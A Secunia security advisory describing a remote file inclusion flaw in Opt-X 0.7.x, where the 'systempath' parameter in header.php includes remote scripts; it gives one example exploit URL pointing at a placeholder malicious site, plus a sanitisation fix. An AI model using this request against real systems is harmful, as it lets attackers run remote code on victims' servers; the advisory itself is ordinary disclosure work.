Opt-X Arbitrary File Inclusion Vulnerability
SECUNIA ADVISORY ID:
SA10967
VERIFY ADVISORY:
http://secunia.com/advisories/10967/
CRITICAL:
Highly critical
IMPACT:
System access
WHERE:
From remote
SOFTWARE:
Opt-X 0.7.x
DESCRIPTION:
G00db0y has reported a vulnerability in Opt-X, which can be exploited by malicious people to compromise a vulnerable system.
User input passed to the "systempath" parameter in "/includes/header.php" is not properly verified before being used to include files. This can be exploited to include scripts from external resources by passing an URL to a remote site.
Example including "menu.php" from a remote site: http://[victim]/includes/header.php?systempath=http://[malicious_site]/
Version 0.7.2 is reportedly affected.
SOLUTION:
Edit the source code to ensure that input passed to the "systempath"
parameter is properly sanitised.
PROVIDED AND/OR DISCOVERED BY:
G00db0y, Zone-h Security Labs.
ORIGINAL ADVISORY:
http://www.zone-h.org/en/advisories/read/id=4036/
For further details and links please click here to see the actual Secunia Advisory: